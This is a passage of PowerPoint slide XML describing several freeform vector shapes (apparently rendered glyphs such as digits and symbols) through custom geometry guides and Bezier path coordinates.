                    <a:pt x="52" y="113"/>
                    <a:pt x="98" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="124"/>
                    <a:pt x="162" y="130"/>
                    <a:pt x="162" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="175"/>
                    <a:pt x="144" y="192"/>
                    <a:pt x="98" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="192"/>
                    <a:pt x="47" y="186"/>
                    <a:pt x="35" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="138"/>
                    <a:pt x="30" y="133"/>
                    <a:pt x="17" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="133"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="153"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="202"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="210"/>
                    <a:pt x="0" y="222"/>
                    <a:pt x="15" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="222"/>
                    <a:pt x="27" y="222"/>
                    <a:pt x="33" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="221"/>
                    <a:pt x="84" y="222"/>
                    <a:pt x="98" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="222"/>
                    <a:pt x="193" y="181"/>
                    <a:pt x="193" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="105"/>
                    <a:pt x="128" y="95"/>
                    <a:pt x="112" y="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1" name="Freeform 112">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DAC8BF5-76AF-4A4C-BC01-2B92751AD00D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId13"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3754439" y="2554288"/>
              <a:ext cx="88900" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 211"/>
                <a:gd name="T1" fmla="*/ 92 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 211"/>
                <a:gd name="T3" fmla="*/ 92 h 279"/>
                <a:gd name="T4" fmla="*/ 200 w 211"/>
                <a:gd name="T5" fmla="*/ 77 h 279"/>
                <a:gd name="T6" fmla="*/ 180 w 211"/>
                <a:gd name="T7" fmla="*/ 61 h 279"/>
                <a:gd name="T8" fmla="*/ 98 w 211"/>
                <a:gd name="T9" fmla="*/ 61 h 279"/>
                <a:gd name="T10" fmla="*/ 98 w 211"/>
                <a:gd name="T11" fmla="*/ 20 h 279"/>
                <a:gd name="T12" fmla="*/ 81 w 211"/>
                <a:gd name="T13" fmla="*/ 0 h 279"/>
                <a:gd name="T14" fmla="*/ 64 w 211"/>
                <a:gd name="T15" fmla="*/ 20 h 279"/>
                <a:gd name="T16" fmla="*/ 64 w 211"/>
                <a:gd name="T17" fmla="*/ 61 h 279"/>
                <a:gd name="T18" fmla="*/ 20 w 211"/>
                <a:gd name="T19" fmla="*/ 61 h 279"/>
                <a:gd name="T20" fmla="*/ 0 w 211"/>
                <a:gd name="T21" fmla="*/ 77 h 279"/>
                <a:gd name="T22" fmla="*/ 20 w 211"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 64 w 211"/>
                <a:gd name="T25" fmla="*/ 92 h 279"/>
                <a:gd name="T26" fmla="*/ 64 w 211"/>
                <a:gd name="T27" fmla="*/ 213 h 279"/>
                <a:gd name="T28" fmla="*/ 134 w 211"/>
                <a:gd name="T29" fmla="*/ 279 h 279"/>
                <a:gd name="T30" fmla="*/ 211 w 211"/>
                <a:gd name="T31" fmla="*/ 213 h 279"/>
                <a:gd name="T32" fmla="*/ 194 w 211"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 211"/>
                <a:gd name="T35" fmla="*/ 213 h 279"/>
                <a:gd name="T36" fmla="*/ 136 w 211"/>
                <a:gd name="T37" fmla="*/ 249 h 279"/>
                <a:gd name="T38" fmla="*/ 98 w 211"/>
                <a:gd name="T39" fmla="*/ 210 h 279"/>
                <a:gd name="T40" fmla="*/ 98 w 211"/>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 h="279">
                  <a:moveTo>
                    <a:pt x="98" y="92"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="92"/>
                    <a:pt x="200" y="92"/>
                    <a:pt x="200" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="61"/>
                    <a:pt x="188" y="61"/>
                    <a:pt x="180" y="61"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="11"/>
                    <a:pt x="98" y="0"/>
                    <a:pt x="81" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="64" y="10"/>
                    <a:pt x="64" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="61"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="61"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="12" y="92"/>
                    <a:pt x="20" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="213"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="261"/>
                    <a:pt x="97" y="279"/>
                    <a:pt x="134" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="279"/>
                    <a:pt x="211" y="258"/>
                    <a:pt x="211" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="204"/>
                    <a:pt x="211" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="194"/>
                    <a:pt x="177" y="204"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="244"/>
                    <a:pt x="148" y="249"/>
                    <a:pt x="136" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="249"/>
                    <a:pt x="98" y="223"/>
                    <a:pt x="98" y="210"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98"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2" name="Freeform 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7788523-B4E7-4E6D-9AB7-E38D5F0BC645}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId14"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3984626" y="2562225"/>
              <a:ext cx="82550" cy="93663"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 112 w 194"/>
                <a:gd name="T1" fmla="*/ 134 h 215"/>
                <a:gd name="T2" fmla="*/ 159 w 194"/>
                <a:gd name="T3" fmla="*/ 162 h 215"/>
                <a:gd name="T4" fmla="*/ 177 w 194"/>
                <a:gd name="T5" fmla="*/ 170 h 215"/>
                <a:gd name="T6" fmla="*/ 194 w 194"/>
                <a:gd name="T7" fmla="*/ 153 h 215"/>
                <a:gd name="T8" fmla="*/ 187 w 194"/>
                <a:gd name="T9" fmla="*/ 140 h 215"/>
                <a:gd name="T10" fmla="*/ 127 w 194"/>
                <a:gd name="T11" fmla="*/ 108 h 215"/>
                <a:gd name="T12" fmla="*/ 181 w 194"/>
                <a:gd name="T13" fmla="*/ 79 h 215"/>
                <a:gd name="T14" fmla="*/ 194 w 194"/>
                <a:gd name="T15" fmla="*/ 62 h 215"/>
                <a:gd name="T16" fmla="*/ 174 w 194"/>
                <a:gd name="T17" fmla="*/ 46 h 215"/>
                <a:gd name="T18" fmla="*/ 112 w 194"/>
                <a:gd name="T19" fmla="*/ 82 h 215"/>
                <a:gd name="T20" fmla="*/ 113 w 194"/>
                <a:gd name="T21" fmla="*/ 21 h 215"/>
                <a:gd name="T22" fmla="*/ 97 w 194"/>
                <a:gd name="T23" fmla="*/ 0 h 215"/>
                <a:gd name="T24" fmla="*/ 80 w 194"/>
                <a:gd name="T25" fmla="*/ 21 h 215"/>
                <a:gd name="T26" fmla="*/ 82 w 194"/>
                <a:gd name="T27" fmla="*/ 82 h 215"/>
                <a:gd name="T28" fmla="*/ 28 w 194"/>
                <a:gd name="T29" fmla="*/ 50 h 215"/>
                <a:gd name="T30" fmla="*/ 17 w 194"/>
                <a:gd name="T31" fmla="*/ 46 h 215"/>
                <a:gd name="T32" fmla="*/ 0 w 194"/>
                <a:gd name="T33" fmla="*/ 62 h 215"/>
                <a:gd name="T34" fmla="*/ 12 w 194"/>
                <a:gd name="T35" fmla="*/ 78 h 215"/>
                <a:gd name="T36" fmla="*/ 66 w 194"/>
                <a:gd name="T37" fmla="*/ 108 h 215"/>
                <a:gd name="T38" fmla="*/ 13 w 194"/>
                <a:gd name="T39" fmla="*/ 137 h 215"/>
                <a:gd name="T40" fmla="*/ 0 w 194"/>
                <a:gd name="T41" fmla="*/ 153 h 215"/>
                <a:gd name="T42" fmla="*/ 20 w 194"/>
                <a:gd name="T43" fmla="*/ 170 h 215"/>
                <a:gd name="T44" fmla="*/ 82 w 194"/>
                <a:gd name="T45" fmla="*/ 134 h 215"/>
                <a:gd name="T46" fmla="*/ 80 w 194"/>
                <a:gd name="T47" fmla="*/ 194 h 215"/>
                <a:gd name="T48" fmla="*/ 97 w 194"/>
                <a:gd name="T49" fmla="*/ 215 h 215"/>
                <a:gd name="T50" fmla="*/ 113 w 194"/>
                <a:gd name="T51" fmla="*/ 194 h 215"/>
                <a:gd name="T52" fmla="*/ 112 w 194"/>
                <a:gd name="T53" fmla="*/ 13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4" h="215">
                  <a:moveTo>
                    <a:pt x="112" y="134"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="151"/>
                    <a:pt x="124" y="141"/>
                    <a:pt x="159" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="170"/>
                    <a:pt x="173" y="170"/>
                    <a:pt x="177" y="170"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="170"/>
                    <a:pt x="194" y="161"/>
                    <a:pt x="194" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="145"/>
                    <a:pt x="188" y="141"/>
                    <a:pt x="187" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="132"/>
                    <a:pt x="140" y="115"/>
                    <a:pt x="127" y="108"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="181" y="79"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="75"/>
                    <a:pt x="194" y="72"/>
                    <a:pt x="194" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="60"/>
                    <a:pt x="194" y="46"/>
                    <a:pt x="174" y="46"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="112" y="82"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="69"/>
                    <a:pt x="113" y="36"/>
                    <a:pt x="113" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="17"/>
                    <a:pt x="113" y="0"/>
                    <a:pt x="97" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="0"/>
                    <a:pt x="80" y="17"/>
                    <a:pt x="80" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="36"/>
                    <a:pt x="81" y="69"/>
                    <a:pt x="82" y="82"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="28" y="50"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="46"/>
                    <a:pt x="20" y="46"/>
                    <a:pt x="17" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="46"/>
                    <a:pt x="0" y="55"/>
                    <a:pt x="0" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="72"/>
                    <a:pt x="6" y="75"/>
                    <a:pt x="12" y="78"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="66" y="108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13" y="137"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="141"/>
                    <a:pt x="0" y="144"/>
                    <a:pt x="0" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="155"/>
                    <a:pt x="0" y="170"/>
                    <a:pt x="20" y="170"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="82" y="134"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="147"/>
                    <a:pt x="80" y="180"/>
                    <a:pt x="80" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="199"/>
                    <a:pt x="80" y="215"/>
                    <a:pt x="97" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="215"/>
                    <a:pt x="113" y="199"/>
                    <a:pt x="113" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="180"/>
                    <a:pt x="113" y="147"/>
                    <a:pt x="112" y="1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3" name="Freeform 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D6444C6-A8AD-4C80-BC37-016A38509E66}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId15"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4124326" y="2581275"/>
              <a:ext cx="25400" cy="93663"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 32 h 215"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 215"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 215"/>
                <a:gd name="T6" fmla="*/ 30 w 62"/>
                <a:gd name="T7" fmla="*/ 63 h 215"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 32 h 215"/>
                <a:gd name="T10" fmla="*/ 62 w 62"/>
                <a:gd name="T11" fmla="*/ 184 h 215"/>
                <a:gd name="T12" fmla="*/ 31 w 62"/>
                <a:gd name="T13" fmla="*/ 153 h 215"/>
                <a:gd name="T14" fmla="*/ 0 w 62"/>
                <a:gd name="T15" fmla="*/ 184 h 215"/>
                <a:gd name="T16" fmla="*/ 30 w 62"/>
                <a:gd name="T17" fmla="*/ 215 h 215"/>
                <a:gd name="T18" fmla="*/ 62 w 62"/>
                <a:gd name="T19" fmla="*/ 1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15">
                  <a:moveTo>
                    <a:pt x="62" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="31" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="16"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="50"/>
                    <a:pt x="14" y="63"/>
                    <a:pt x="30" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="63"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62" y="32"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="62" y="184"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="166"/>
                    <a:pt x="47" y="153"/>
                    <a:pt x="31" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="153"/>
                    <a:pt x="0" y="168"/>
                    <a:pt x="0" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="202"/>
                    <a:pt x="14" y="215"/>
                    <a:pt x="30" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="215"/>
                    <a:pt x="62" y="200"/>
                    <a:pt x="62" y="18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4" name="Freeform 115">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6E8F4F0-5AE9-4604-A9F8-2B30FE54F424}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId16"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4200526" y="2540000"/>
              <a:ext cx="93663" cy="138113"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 109 w 218"/>
                <a:gd name="T1" fmla="*/ 131 h 316"/>
                <a:gd name="T2" fmla="*/ 42 w 218"/>
                <a:gd name="T3" fmla="*/ 80 h 316"/>
                <a:gd name="T4" fmla="*/ 109 w 218"/>
                <a:gd name="T5" fmla="*/ 30 h 316"/>
                <a:gd name="T6" fmla="*/ 176 w 218"/>
                <a:gd name="T7" fmla="*/ 80 h 316"/>
                <a:gd name="T8" fmla="*/ 109 w 218"/>
                <a:gd name="T9" fmla="*/ 131 h 316"/>
                <a:gd name="T10" fmla="*/ 148 w 218"/>
                <a:gd name="T11" fmla="*/ 146 h 316"/>
                <a:gd name="T12" fmla="*/ 211 w 218"/>
                <a:gd name="T13" fmla="*/ 80 h 316"/>
                <a:gd name="T14" fmla="*/ 109 w 218"/>
                <a:gd name="T15" fmla="*/ 0 h 316"/>
                <a:gd name="T16" fmla="*/ 7 w 218"/>
                <a:gd name="T17" fmla="*/ 80 h 316"/>
                <a:gd name="T18" fmla="*/ 70 w 218"/>
                <a:gd name="T19" fmla="*/ 146 h 316"/>
                <a:gd name="T20" fmla="*/ 0 w 218"/>
                <a:gd name="T21" fmla="*/ 223 h 316"/>
                <a:gd name="T22" fmla="*/ 109 w 218"/>
                <a:gd name="T23" fmla="*/ 316 h 316"/>
                <a:gd name="T24" fmla="*/ 218 w 218"/>
                <a:gd name="T25" fmla="*/ 223 h 316"/>
                <a:gd name="T26" fmla="*/ 148 w 218"/>
                <a:gd name="T27" fmla="*/ 146 h 316"/>
                <a:gd name="T28" fmla="*/ 109 w 218"/>
                <a:gd name="T29" fmla="*/ 285 h 316"/>
                <a:gd name="T30" fmla="*/ 35 w 218"/>
                <a:gd name="T31" fmla="*/ 223 h 316"/>
                <a:gd name="T32" fmla="*/ 109 w 218"/>
                <a:gd name="T33" fmla="*/ 161 h 316"/>
                <a:gd name="T34" fmla="*/ 183 w 218"/>
                <a:gd name="T35" fmla="*/ 223 h 316"/>
                <a:gd name="T36" fmla="*/ 109 w 218"/>
                <a:gd name="T37" fmla="*/ 285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8" h="316">
                  <a:moveTo>
                    <a:pt x="109" y="131"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="131"/>
                    <a:pt x="42" y="108"/>
                    <a:pt x="42" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="54"/>
                    <a:pt x="70" y="30"/>
                    <a:pt x="109" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="30"/>
                    <a:pt x="176" y="54"/>
                    <a:pt x="176" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="109"/>
                    <a:pt x="145" y="131"/>
                    <a:pt x="109" y="131"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="148" y="146"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="133"/>
                    <a:pt x="211" y="108"/>
                    <a:pt x="211" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="39"/>
                    <a:pt x="168" y="0"/>
                    <a:pt x="109" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="0"/>
                    <a:pt x="7" y="39"/>
                    <a:pt x="7" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="108"/>
                    <a:pt x="30" y="133"/>
                    <a:pt x="70" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="157"/>
                    <a:pt x="0" y="186"/>
                    <a:pt x="0" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="272"/>
                    <a:pt x="47" y="316"/>
                    <a:pt x="109" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="316"/>
                    <a:pt x="218" y="272"/>
                    <a:pt x="218" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218" y="186"/>
                    <a:pt x="185" y="157"/>
                    <a:pt x="148" y="146"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="109" y="285"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="285"/>
                    <a:pt x="35" y="257"/>
                    <a:pt x="35" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="193"/>
                    <a:pt x="64" y="161"/>
                    <a:pt x="109" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="161"/>
                    <a:pt x="183" y="193"/>
                    <a:pt x="183" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="257"/>
                    <a:pt x="150" y="285"/>
                    <a:pt x="109" y="28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5" name="Freeform 116">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92FB732A-4906-471F-AC3D-FC8D0EE1B60D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId17"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4313239" y="2540000"/>
              <a:ext cx="88900" cy="138113"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 211 w 211"/>
                <a:gd name="T1" fmla="*/ 158 h 316"/>
                <a:gd name="T2" fmla="*/ 105 w 211"/>
                <a:gd name="T3" fmla="*/ 0 h 316"/>
                <a:gd name="T4" fmla="*/ 0 w 211"/>
                <a:gd name="T5" fmla="*/ 158 h 316"/>
                <a:gd name="T6" fmla="*/ 105 w 211"/>
                <a:gd name="T7" fmla="*/ 316 h 316"/>
                <a:gd name="T8" fmla="*/ 211 w 211"/>
                <a:gd name="T9" fmla="*/ 158 h 316"/>
                <a:gd name="T10" fmla="*/ 105 w 211"/>
                <a:gd name="T11" fmla="*/ 285 h 316"/>
                <a:gd name="T12" fmla="*/ 34 w 211"/>
                <a:gd name="T13" fmla="*/ 153 h 316"/>
                <a:gd name="T14" fmla="*/ 105 w 211"/>
                <a:gd name="T15" fmla="*/ 30 h 316"/>
                <a:gd name="T16" fmla="*/ 177 w 211"/>
                <a:gd name="T17" fmla="*/ 153 h 316"/>
                <a:gd name="T18" fmla="*/ 105 w 211"/>
                <a:gd name="T19" fmla="*/ 285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1" h="316">
                  <a:moveTo>
                    <a:pt x="211" y="158"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="65"/>
                    <a:pt x="160" y="0"/>
                    <a:pt x="105" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="0"/>
                    <a:pt x="0" y="67"/>
                    <a:pt x="0" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="250"/>
                    <a:pt x="51" y="316"/>
                    <a:pt x="105" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="316"/>
                    <a:pt x="211" y="249"/>
                    <a:pt x="211" y="158"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="105" y="285"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="285"/>
                    <a:pt x="34" y="226"/>
                    <a:pt x="34" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="80"/>
                    <a:pt x="69" y="30"/>
                    <a:pt x="105" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="30"/>
                    <a:pt x="177" y="79"/>
                    <a:pt x="177" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="226"/>
                    <a:pt x="144" y="285"/>
                    <a:pt x="105" y="28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6" name="Freeform 117">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA13102C-1121-4E02-BDC4-42AED310BC33}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId18"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4425951" y="2554288"/>
              <a:ext cx="85725" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 195 w 206"/>
                <a:gd name="T1" fmla="*/ 141 h 249"/>
                <a:gd name="T2" fmla="*/ 206 w 206"/>
                <a:gd name="T3" fmla="*/ 125 h 249"/>
                <a:gd name="T4" fmla="*/ 197 w 206"/>
                <a:gd name="T5" fmla="*/ 109 h 249"/>
                <a:gd name="T6" fmla="*/ 31 w 206"/>
                <a:gd name="T7" fmla="*/ 5 h 249"/>
                <a:gd name="T8" fmla="*/ 18 w 206"/>
                <a:gd name="T9" fmla="*/ 0 h 249"/>
                <a:gd name="T10" fmla="*/ 0 w 206"/>
                <a:gd name="T11" fmla="*/ 17 h 249"/>
                <a:gd name="T12" fmla="*/ 12 w 206"/>
                <a:gd name="T13" fmla="*/ 34 h 249"/>
                <a:gd name="T14" fmla="*/ 155 w 206"/>
                <a:gd name="T15" fmla="*/ 125 h 249"/>
                <a:gd name="T16" fmla="*/ 12 w 206"/>
                <a:gd name="T17" fmla="*/ 215 h 249"/>
                <a:gd name="T18" fmla="*/ 0 w 206"/>
                <a:gd name="T19" fmla="*/ 232 h 249"/>
                <a:gd name="T20" fmla="*/ 18 w 206"/>
                <a:gd name="T21" fmla="*/ 249 h 249"/>
                <a:gd name="T22" fmla="*/ 31 w 206"/>
                <a:gd name="T23" fmla="*/ 244 h 249"/>
                <a:gd name="T24" fmla="*/ 195 w 206"/>
                <a:gd name="T25" fmla="*/ 14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49">
                  <a:moveTo>
                    <a:pt x="195" y="141"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="138"/>
                    <a:pt x="206" y="134"/>
